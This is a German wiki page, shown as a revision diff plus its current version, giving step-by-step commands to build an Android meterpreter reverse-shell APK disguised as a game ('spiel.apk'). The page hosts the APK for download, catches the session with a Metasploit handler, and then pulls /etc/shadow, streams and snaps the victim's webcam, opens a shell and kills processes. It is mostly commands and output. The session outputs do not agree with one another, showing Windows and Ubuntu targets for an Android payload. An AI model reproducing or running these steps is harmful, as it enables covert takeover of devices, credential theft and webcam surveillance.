Metasploit trojaner android: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (13 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt) | |||
| Zeile 12: | Zeile 12: | ||
=create Payload= | =create Payload= | ||
| − | *msfvenom -p android/meterpreter/reverse_tcp LHOST=10. | + | *cd /var/www/html/ |
| − | + | *msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 R> spiel.apk | |
=get Payload on the target computer an start= | =get Payload on the target computer an start= | ||
| − | *wget http://10. | + | *wget http://10.0.10.101/spiel.apk |
=Launch Console= | =Launch Console= | ||
| Zeile 33: | Zeile 33: | ||
</pre> | </pre> | ||
*msf > use exploit/multi/handler | *msf > use exploit/multi/handler | ||
| − | *msf exploit(handler) > set PAYLOAD | + | *msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp |
| − | *msf exploit(handler) > set LHOST 10. | + | *msf exploit(handler) > set LHOST 10.0.10.101 |
| − | LHOST => 10. | + | LHOST => 10.0.10.101 |
| − | *msf exploit(handler) > set LPORT | + | *msf exploit(handler) > set LPORT 4444 |
| − | LPORT => | + | LPORT => 4444 |
=Start the exploits= | =Start the exploits= | ||
| Zeile 43: | Zeile 43: | ||
[*] Exploit running as background job 0. | [*] Exploit running as background job 0. | ||
| − | [*] Started reverse TCP handler on 10. | + | [*] Started reverse TCP handler on 10.0.10.101:4444 |
=Viewing the sessions= | =Viewing the sessions= | ||
| Zeile 61: | Zeile 61: | ||
[*] Starting interaction with 1... | [*] Starting interaction with 1... | ||
| − | =Metapreter | + | =Metapreter File Management= |
==pwd== | ==pwd== | ||
*meterpreter > pwd | *meterpreter > pwd | ||
| Zeile 93: | Zeile 93: | ||
Webcam shot saved to: /root/PDYSnlbK.jpeg | Webcam shot saved to: /root/PDYSnlbK.jpeg | ||
| − | = | + | =Starting a Shell (No Shell Prompt)= |
*meterpreter > shell | *meterpreter > shell | ||
<pre> | <pre> | ||
| Zeile 100: | Zeile 100: | ||
</pre> | </pre> | ||
*C:\Users\xinux\Downloads> | *C:\Users\xinux\Downloads> | ||
| − | == | + | ==Examples Shell== |
*ifconfig | *ifconfig | ||
*route -n | *route -n | ||
Aktuelle Version vom 6. August 2021, 12:15 Uhr
Check Android payloads
- msfvenom -l | grep android
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
create Payload
- cd /var/www/html/
- msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 R> spiel.apk
get Payload on the target computer an start
Launch Console
- msfconsole
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.16.6-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 10.0.10.101
LHOST => 10.0.10.101
- msf exploit(handler) > set LPORT 4444
LPORT => 4444
Start the exploits
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.0.10.101:4444
Viewing the sessions
- msf exploit(handler) > sessions
Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/windows shuttle\xinux @ SHUTTLE 10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
Changing the sessions
- msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Metapreter File Management
pwd
- meterpreter > pwd
cd
- meterpreter > cd ..
- meterpreter > cd /etc
Download
- meterpreter > download shadow
upload
- meterpreter > cd /root
- meterpreter > upload /etc/hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting... [*] Preparing player... [*] Opening player at: XZLHwhtQ.html [*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/PDYSnlbK.jpeg
Starting a Shell (No Shell Prompt)
- meterpreter > shell
Process 14779 created. Channel 5 created.
- C:\Users\xinux\Downloads>
Examples Shell
- ifconfig
- route -n
- netstat -ltpn
Quit
- STRG+c
Sysinfo
- meterpreter > sysinfo
Computer : gustavo.xinux.lan OS : Ubuntu 16.04 (Linux 4.4.0-97-generic) Architecture : x64 Meterpreter : x64/linux
Kill a Prozess
- meterpreter > pkill notepad
Filtering on 'notepad' Killing: 3240